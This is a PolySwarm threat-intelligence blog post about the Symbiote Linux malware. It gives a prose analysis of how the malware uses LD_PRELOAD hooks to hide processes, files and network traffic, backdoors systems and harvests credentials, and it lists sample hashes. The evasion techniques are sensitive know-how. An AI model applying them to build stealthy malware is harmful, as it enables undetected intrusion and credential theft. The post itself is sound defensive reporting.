Insights, news, education and announcements from PolySwarm

Symbiote Linux Malware

Written by PolySwarm Tech Team | Jun 20, 2022 4:01:49 PM



Executive Summary

Intezer and BlackBerry recently reported on Symbiote, a difficult to detect Linux malware that relies on existing running processes to infect a system.

Key Takeaways

  • Symbiote primarily targets financial institutions in Latin America.
  • Symbiote acts as a parasite, hijacking existing processes.
  • Symbiote is difficult to detect, as it hides itself and its network traffic.
  • Symbiote’s three main objectives are to evade detection, provide backdoor access, and harvest credentials.
What is Symbiote?

In our 2021 Year in Review, we predicted an uptick in Linux malware for 2022. Symbiote is a Linux malware, named due to its symbiote-like behavior. In symbiosis, an organism lives with and relies on another organism for existence. The relationship can be mutually beneficial to both organisms, or the symbiote can act as a parasite. Symbiote malware was first detected in November 2021, targeting financial institutions in Latin America. The domain names used in Symbiote’s infrastructure attempt to impersonate high-profile Brazilian banks. However, it is unclear whether the malware is being used for highly targeted or broad attacks.

Symbiote malware is not a standalone executable. It acts as a parasite, having a shared object library loaded into all running processes to infect a system using LD_PRELOAD. As a result, it is loaded before other shared objects, allowing it to hijack imports from other library files loaded for an application. Following successful infection, the malware hooks libc and libpcap functions and hides itself and any accompanying malware, in an attempt to thwart detection. Since any file, process, or network artifacts are hidden, the malware is difficult to detect even when performing live forensics.

In the binary, there is an RC4 encrypted file list. When hooked functions are called, Symbiote dynamically loads libc and calls the original function. Since Symbiote is loaded into processes using LD_PRELOAD, tools like ldd would list the malware as a loaded object. To combat this, Symbiote hooks execve and looks for calls to the function with the environment variable LD_TRACE_LOADED_OBJECTS set to 1. When this is detected, Symbiote executes the loader as ldd would, but scrubs its own entry from the result.

Symbiote hides its network activity using three separate methods:
  •  In the first method, Symbiote hooks fopen and fopen64. If the calling application tries to open /proc/net/tcp, Symbiote creates a temp file and copies the first line to that file. It then scans each line for the presence of specific ports. If the malware finds a port it’s searching for on a particular line, it skips to the next line. If the port is not found on a line, the line is written to the temp file. Symbiote then closes the file and returns the file descriptor of the temp file back to the caller. This gives the calling process a scrubbed result, which does not include network connection entries the malware wants to hide. 
  • In the second method, Symbiote hijacks any injected packet filtering bytecode. Analysts at Intezer and BlackBerry observed filtering of traffic based on ports and on IPv4 addresses, for both inbound and outbound traffic. This method allows the malware to filter TCP packets. 
  • In the third method, Symbiote hooks libpcap functions. This allows Symbiote to filter out UDP traffic to domain names it has in a list. For each packet received, the malware checks the UDP payload for substrings of these domains. If a match is found, the malware ignores the packet and increments a counter. Then pcap_stats uses this counter to “correct” the number of packets processed, subtracting the counter value from the true number of packets processed.
Once all running processes are infected, the threat actor obtains rootkit functionality. Symbiote gives the threat actor a backdoor to log in as any user on the victim’s system with a hardcoded password and lets them execute commands with highest privileges. Threat actors can use Symbiote to harvest credentials and maintain persistence via remote access.

IOCs

PolySwarm has multiple samples of Symbiote.

F55af21f69a183fb8550ac60f392b05df14aa01d7ffe9f28bc48a118dc110b4c

121157e0fcb728eb8a23b55457e89d45d76aa3b7d01d3d49105890a00662c924

45eacba032367db7f3b031e5d9df10b30d01664f24da6847322f6af1fd8e7f01

You can use the following CLI command to search for all Symbiote samples in our portal:

$ polyswarm link list -f Symbiote


Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports